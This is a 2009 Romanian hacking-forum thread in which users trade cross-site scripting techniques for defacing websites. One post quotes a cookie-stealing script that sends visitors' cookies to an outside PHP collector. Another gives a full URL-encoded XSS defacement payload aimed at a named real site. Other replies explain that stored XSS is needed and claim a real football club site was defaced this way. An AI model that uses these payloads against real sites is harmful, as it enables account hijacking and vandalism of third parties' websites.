dRuNNNk Posted November 7, 2009 Report Posted November 7, 2009 ma poate ajuta cineva la xss defacement nu pricep ce trebuie sa fac.Cum pot face xss defacement fara sa ii dau adminului <script>document.location="http://siteulmeu.com/cookiestealer.php?cookie=" +document.cookies</script>se poate altfel?> Quote
dRuNNNk Posted November 7, 2009 Author Report Posted November 7, 2009 am inteles dar eu am siteu astaserials.ws daca introduc codul innerHTMl nu pateste nimic Quote
1337 Posted November 7, 2009 Report Posted November 7, 2009 Ca sa dai deface prin xss trebuie ca vulnerabilitatea sa fie una de tip permanenta (cred?)Nu merge la toate siteurileLa asta de exemplu mergehttp://portal-braila.ro/cauta.php?cauta_textul=%3Cscript%3Edocument.body.innerHTML%3D%22%3Cstyle%3Ebody{visibility:hidden;+background:black;}%3C/style%3E%3Cdiv+style%3Dvisibility:visible;%3E%3Ccenter%3E%3Ch1%3E%3Cfont+color%3D'white'%3ENoi+vrem+%3C/font%3E%3Cfont+color%3D'red'%3Erespect+%3C/font%3E%3Cfont+color%3D'white'%3E!%3C/font%3E%3C/h1%3E%3Cbr%3E%3Cimg+src%3D'http://img379.imageshack.us/img379/5761/imagine3km7.png'%3E%3Cbr%3E%3Cobject+width%3D'448'+height%3D'46'%3E%3Cparam+name%3D'movie'+value%3D'http://embed.trilulilu.ro/audio/smbdstopme/e020c0d1cdcfd8.swf'%3E%3C/param%3E%3Cparam+name%3D'allowFullScreen'+value%3D'true'%3E%3C/param%3E%3Cparam+name%3D'allowscriptaccess'+value%3D'always'%3E%3C/param%3E%3Cembed+src%3D'http://embed.trilulilu.ro/audio/smbdstopme/e020c0d1cdcfd8.swf'+type%3D'application/x-shockwave-flash'+allowscriptaccess%3D'always'+allowfullscreen%3D'true'+width%3D'448'+height%3D'46'%3E%3C/embed%3E%3C/object%3E%3Cbr+/%3E%3Cfont+color%3D'white'%3E%3Cb%3ECampanie+sustinuta+de:+xap,+ynneb,+edoknit,+yttif%3C/b%3E%3C/font%3E%3C/center%3E%3C/div%3E%22;%3C/script%3E&nr=0 Quote
dRuNNNk Posted November 7, 2009 Author Report Posted November 7, 2009 multumesc baieti am mai invatat inca ceva Quote
Tazor Posted November 8, 2009 Report Posted November 8, 2009 dRuNNNk crede ca daca introduce codul meu in parametru o sa dea deface la serials.ws ... codul xss trebuie sa fie afisat pe o pagina pentru a fi executat de browser-ul userului.fcsteaua.ro a luat deface cand a fost modificat numele unui articol cu codul de mai sus. cei care vizitau fcsteaua.ro/index.php executau javascriptul si le aparea altceva. e asa greu ?si cum ai modificat numele articolului? Quote
Vlachs Posted November 9, 2009 Report Posted November 9, 2009 si cum ai modificat numele articolului?kw3 da uite aici material pt warn si tu imi dai mie Quote
